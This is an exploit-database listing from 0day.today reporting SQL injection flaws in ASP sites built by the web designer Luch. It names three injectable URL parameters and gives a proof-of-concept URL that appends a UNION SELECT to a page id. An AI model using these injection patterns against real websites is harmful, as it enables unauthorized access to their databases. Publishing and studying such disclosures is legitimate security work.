Luch Web Designer Multiple SQL Injection Vulnerabilities

2011-03-11T00:00:00
ID 1337DAY-ID-15573
Type zdt
Reporter p0pc0rn
Modified 2011-03-11T00:00:00

Description

Exploit for asp platform in category web applications

                                        
                                            Title   : Web Designed by LUCH Vulnerable to SQL Injection
Vendor  : http://www.luch.co.il
Found by: p0pc0rn
 
SQL
---
 
http://site.com/page.asp?id=[SQL]
http://site.com/cat.asp?catid=[SQL]
http://site.com/catin.asp?productid=[SQL]
 
POC
---
http://site.com/page.asp?id=23 union select 1 from test.a



#  0day.today [2018-01-17]  #